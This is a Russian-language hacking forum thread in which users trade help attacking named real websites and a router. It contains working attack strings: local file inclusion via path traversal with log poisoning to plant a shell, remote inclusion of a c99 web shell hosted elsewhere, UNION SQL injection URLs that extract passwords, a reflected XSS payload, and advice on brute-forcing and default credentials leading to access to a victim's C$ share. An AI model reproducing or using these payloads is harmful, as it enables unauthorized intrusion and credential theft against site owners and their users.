мой include вот http://www.holsteinworld.com/ontheroad/index.php?file=/../../../../../../../../../../../usr/local/apache2/logs/error_log

как составить помогите плиз.

в гет параметр воткни свой шелл, потом проинклудь и все будет окей
был бы файл access, там можно было бы подменить useragent таким же макаром.

кстати, не обязательно в данном случае использовать инеткрак или еще чего,для опыта делай просто через адресную строку

GET http://holsteinworld.com/ontheroad/index.php?file=/../../../../../../../../../../../usr/local/apache2/logs/error_log HTTP/1.1
Accept: */*
Accept-Language: ru
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows
98)
Host: holsteinworld.com
Proxy-Connection: Keep-Alive

как взломать пароль к системе вот переходиш по ссылке http://92.0.0.117/ и просит пароль , каким брутом можна подобрать?

как взломать пароль к системе вот переходиш по ссылке http://92.0.0.117/ и просит пароль , каким брутом можна подобрать?

любым брутом который брутит http basic авторизацию, даже можно старым добрым брутусом

Еще THC Hydra для линуска.

как взломать пароль к системе вот переходиш по ссылке http://92.0.0.117/ и просит пароль , каким брутом можна подобрать?
эм,
root
root
:) правда входишь в настройки свича, или что там такое стоит

Это adsl роутер-модем компа, который седит за NATом

ну так этож шикарно, и через него разве на комп низя попасть ? кстати если несложно либо тут в теме либо в ПМ скиньте потом как это можно сделать, если можно.
И заодно интерестно из него какую палезную инфу можно вытащить.
Все только ради интереса.

ну так этож шикарно, и через него разве на комп низя попасть ? кстати если несложно либо тут в теме либо в ПМ скиньте потом как это можно сделать, если можно.
И заодно интерестно из него какую палезную инфу можно вытащить.
Все только ради интереса.

можно. надо сделать проброс портов на 445 и 139 tcp и 137 udp на 127.0.0.1

и зайти по адресуу в explorere \\92.0.0.117\c$

и мы можем попасть на диск C


//add

какойто урод конфиг щас поменял, что теперь не зайти

ну значит эти логин и пароль как раз то что и искал ben1991.

add ))
оперативно работают

Если открыт 445 порт то вам сюда >
https://forum.antichat.ru/thread99665.html

Database query errorYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0--' at line

странно... через "ордер бай" выяснил то что 19 колонок... когда их все пишу:
10+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9,0--

выдаёт такую хрень!((
подозреваю что в версии MySQL трабла так?

F4R скорее всего union запрещен

если хочешь, кинь в личку ссылку гляну что там.

странно... через "ордер бай" выяснил то что 19 колонок... когда их все пишу:
10+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9,0--


Выяснил, что 19 колонок, а пишешь 20, посчитай...

странно... через "ордер бай" выяснил то что 19 колонок... когда их все пишу:


выдаёт такую хрень!((
подозреваю что в версии MySQL трабла так?
Давай ссылку в пм.

Выяснил, что 19 колонок, а пишешь 20, посчитай...
да это я так.. случайно... просто перебирал может больше может и меньше ну знаешь иногда такое бывает ну так и скопировал наверно!... так то сначала 19 пробовал!

подскажите пож. вот сайт я его ломанул вот только 2 вопроса что с пасами они неправельно выглядят , и 2 есть ли там мыло админа и как узнать его ник ? а да вот сайт http://tass-ural.ru/news/?id=-47468+union+select+1,pass,3,4,5,6,7,8,9,10,11,12,1 3,14+FROM+subscribe--

там же есть колонка email
Это подписчики ))

там же есть колонка email
Это подписчики ))
ну почему так пас отабражён ? и есть ли там пас админа ?

ну почему так пас отабражён ? и есть ли там пас админа ?
может зашифрован, может кодировка не та, и пасс админа найдешь там врядли

вот сайт я его ломанул
:)

вот только 2 вопроса что с пасами они неправельно выглядят , и 2 есть ли там мыло админа и как узнать его ник ?
1. C пассами всё нормально, они зашифрованы. Думаю, что это aes_encrypt обычный, хотя может и самопис какой

2. Врятли пароль в базе, скорее всего он в хтпассворд каком-нибудь
http://tass-ural.ru/admin/

скажите где взять большие словари названий таблиц и колонок для сипта. ОООЧЕНЬ БОЛЬШИЕ.

Прилагаются к сипт
+ очень часто попадаются переводы этих слов на другие языки. Можно сгенерить хорошую базу.

скажите где взять большие словари названий таблиц и колонок для сипта. ОООЧЕНЬ БОЛЬШИЕ.
http://i062.radikal.ru/0907/bf/82230ce60282.jpg

ну вы че за ламера меня совсем держите)? Знаю я про стандартный словарик. Он маленький и нашел ток одну табличку) и 0 полей в ней. Язык англ нада - без префиксов.

Там есть в комплекте словарь побольше :)

Вопрос: http://www.shu.ru/index.php?id=27;select+version()::int--
Подбор колонок никак не получается. Ни нуллом, ни числом, ни ордером. Хелп.

Вопрос: http://www.shu.ru/index.php?id=27;select+version()::int--
Подбор колонок никак не получается. Ни нуллом, ни числом, ни ордером. Хелп.

http://www.shu.ru/index.php?id=27/**/UNION/**/SELECT/**/null,null,CAST(version()/**/AS/**/text),null,null,null--

сенкс

Почему не удается шелл подключить =(
http://www.npithub.com/index.php?fname=http://wowbkdo.narod.ru/c99madshell.php
Хотя так сайт внутри открывается =(
http://www.npithub.com/index.php?fname=http://wowbkdo.narod.ru/

Это фрейм, а не инклюд.

вопрос по XSS
вот сцыль на регистрацию на неком ресурсе
http://ru.bigpoint.com/signup/
если в поле никнейма написать некторый js код, к примеру
"><script>alert("xss")</script>
и нажать на зарегиться то, данный js код сработает, но рега конечно непройдет (не в этом суть)
Получаеться вроде как пассивная XSS, либо в силу своего незнания либо в силу нестандартности разработчик, вобщем я так и непонял как перадть параметр никнейм через адресную строку. Из кода ясно что переменная не передаеться не как POST не как GET, и ваще его не скрипт обрабатывает а проста HTML.
И что получаеться это и вовсе не уязвимость ?
---------------------------
прошу неспалить это на их сайте массовой попыткой реги таких ников ))

после того как пытаешся зарег-тся под ником
"><script>alert("xss")</script>
скрипт проверяет его длину (от 4 до 20 символов).
если его длина не входит в рамки ограничений то выводит к примеру
ник $_POST['nick'](ему передано значение "><script>alert("xss")</script> и по этому вылазит окно.Там не стоит
htmlspecialchars()) имеет длину больше 20 символов.
>>Из кода ясно что переменная не передаеться не как POST не как GET
данные передаються методом POST
<form method="POST"
>>И что получаеться это и вовсе не уязвимость ?
уязвимость но с нее в данном случае толку 0

все значит из за глупости моей :), а можешь прям на этом примере показать как ее передать через адрес ? или POST так невыйдет

в данном случае через адресную строку не передашь потому что метод передачи данных POST

в данном случае через адресную строку не передашь потому что метод передачи данных POST
Не согласен,в данном случаии(http://ru.bigpoint.com/signup/) переменные принимаються через REQUEST(ну или регистр глобалс) скорее всего, потому как пассивка на лицо:

http://ru.bigpoint.com/signup/?signUp=1&openId=&signUpUsername=asd%22%3E%3Cscript%3Ealert(%22xss%2 2)%3C%2Fscript%3E&password=123456789&passwordRepeat=123456789&email=asd%40sad.ru&birthday[Day]=3&birthday[Month]=02&birthday[Year]=1987&sex=MALE&country=UA&province=&receiveNewsletter=1&winnings=1

http://forum.antichat.ru/showpost.php?p=1389998&postcount=8135

Актуально

Pavlov, hex не поможет тут...
Byrger, если ты и сможешь подделать IP, всеравно экранировка кавычки произойдет.

http://www.acumenin.com/index.php?p=../index.php

Можно ли что нить придумать дальше? Не силен в инклюдах =(

Можно.... Например записать в сессию пхп код... далее инклудить его.
Поискать возможности заливки файла для дальнейшего инклуда и тд. и тп.